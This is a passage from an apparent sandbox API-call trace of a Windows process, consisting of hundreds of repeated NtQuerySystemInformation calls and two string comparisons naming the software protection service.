Length=0x0, ResultLength=0x0) [0185.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe9b0, Length=0x28, ResultLength=0x0) [0185.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fea90, Length=0x38, ResultLength=0x0) [0185.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe910, Length=0x20, ResultLength=0x0) [0185.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe890, Length=0x20, ResultLength=0x0) [0185.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe890, Length=0x20, ResultLength=0x0) [0185.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe890, Length=0x20, ResultLength=0x0) [0185.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fea90, Length=0x38, ResultLength=0x0) [0185.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe910, Length=0x20, ResultLength=0x0) [0185.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe8a0, Length=0x20, ResultLength=0x0) [0185.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe8a0, Length=0x20, ResultLength=0x0) [0185.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec70, Length=0x50, ResultLength=0x0) [0185.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec70, Length=0x50, ResultLength=0x0) [0185.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec70, Length=0x50, ResultLength=0x0) [0185.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb60, Length=0x50, ResultLength=0x0) [0185.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb60, Length=0x50, ResultLength=0x0) [0185.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb60, Length=0x50, ResultLength=0x0) [0185.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb60, Length=0x50, ResultLength=0x0) [0185.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fea90, Length=0x38, ResultLength=0x0) [0185.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe8c0, Length=0x28, ResultLength=0x0) [0185.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe8c0, Length=0x28, ResultLength=0x0) [0185.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe8c0, Length=0x28, ResultLength=0x0) [0185.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe8c0, Length=0x28, ResultLength=0x0) [0185.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe930, Length=0x28, ResultLength=0x0) [0185.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fea90, Length=0x38, ResultLength=0x0) [0185.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe9b0, Length=0x28, ResultLength=0x0) [0185.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe9b0, Length=0x28, ResultLength=0x0) [0185.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fea90, Length=0x38, ResultLength=0x0) [0185.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe910, Length=0x20, ResultLength=0x0) [0185.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe890, Length=0x20, ResultLength=0x0) [0185.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe890, Length=0x20, ResultLength=0x0) [0185.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe890, Length=0x20, ResultLength=0x0) [0185.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fea90, Length=0x38, ResultLength=0x0) [0185.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe910, Length=0x20, ResultLength=0x0) [0185.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe8a0, Length=0x20, ResultLength=0x0) [0185.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe8a0, Length=0x20, ResultLength=0x0) [0185.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed20, Length=0x50, ResultLength=0x0) [0185.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feca0, Length=0x28, ResultLength=0x0) [0185.094] _wcsicmp (_String1="SPPSVC\\$$global$$", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0185.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed20, Length=0x50, ResultLength=0x0) [0185.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed20, Length=0x50, ResultLength=0x0) [0185.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed20, Length=0x50, ResultLength=0x0) [0185.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec50, Length=0x38, ResultLength=0x0) [0185.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fea80, Length=0x28, ResultLength=0x0) [0185.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fea80, Length=0x28, ResultLength=0x0) [0185.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fea80, Length=0x28, ResultLength=0x0) [0185.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fea80, Length=0x28, ResultLength=0x0) [0185.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feaf0, Length=0x28, ResultLength=0x0) [0185.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec50, Length=0x38, ResultLength=0x0) [0185.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb70, Length=0x28, ResultLength=0x0) [0185.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb70, Length=0x28, ResultLength=0x0) [0185.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec50, Length=0x38, ResultLength=0x0) [0185.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fead0, Length=0x20, ResultLength=0x0) [0185.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fea50, Length=0x20, ResultLength=0x0) [0185.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fea50, Length=0x20, ResultLength=0x0) [0185.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fea50, Length=0x20, ResultLength=0x0) [0185.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec50, Length=0x38, ResultLength=0x0) [0185.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fead0, Length=0x20, ResultLength=0x0) [0185.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fea60, Length=0x20, ResultLength=0x0) [0185.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fea60, Length=0x20, ResultLength=0x0) [0185.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed20, Length=0x50, ResultLength=0x0) [0185.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feca0, Length=0x28, ResultLength=0x0) [0185.100] _wcsicmp (_String1="SPPSVC\\$$global$$", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0185.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed20, Length=0x50, ResultLength=0x0) [0185.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed20, Length=0x50, ResultLength=0x0) [0185.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed20, Length=0x50, ResultLength=0x0) [0185.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec50, Length=0x38, ResultLength=0x0) [0185.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fea80, Length=0x28, ResultLength=0x0) [0185.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fea80, Length=0x28, ResultLength=0x0) [0185.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fea80, Length=0x28, ResultLength=0x0) [0185.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fea80, Length=0x28, ResultLength=0x0) [0185.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feaf0, Length=0x28, ResultLength=0x0) [0185.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec50, Length=0x38, ResultLength=0x0) [0185.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb70, Length=0x28, ResultLength=0x0) [0185.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb70, Length=0x28, ResultLength=0x0) [0185.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec50, Length=0x38, ResultLength=0x0) [0185.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fead0, Length=0x20, ResultLength=0x0) [0185.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fea50, Length=0x20, ResultLength=0x0) [0185.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fea50, Length=0x20, ResultLength=0x0) [0185.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fea50, Length=0x20, ResultLength=0x0) [0185.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec50, Length=0x38, ResultLength=0x0) [0185.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fead0, Length=0x20, ResultLength=0x0) [0185.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fea60, Length=0x20, ResultLength=0x0) [0185.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fea60, Length=0x20, ResultLength=0x0) [0185.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fefc0, Length=0x48, ResultLength=0x0) [0185.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee40, Length=0x40, ResultLength=0x0) [0185.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feaf0, Length=0x50, ResultLength=0x0) [0185.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feaf0, Length=0x50, ResultLength=0x0) [0185.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feaf0, Length=0x50, ResultLength=0x0) [0185.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe9e0, Length=0x50, ResultLength=0x0) [0185.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe9e0, Length=0x50, ResultLength=0x0) [0185.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe9e0, Length=0x50, ResultLength=0x0) [0185.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe9e0, Length=0x50, ResultLength=0x0) [0185.193] NtQuerySystemInformation (SystemInformationClass=0xb9, 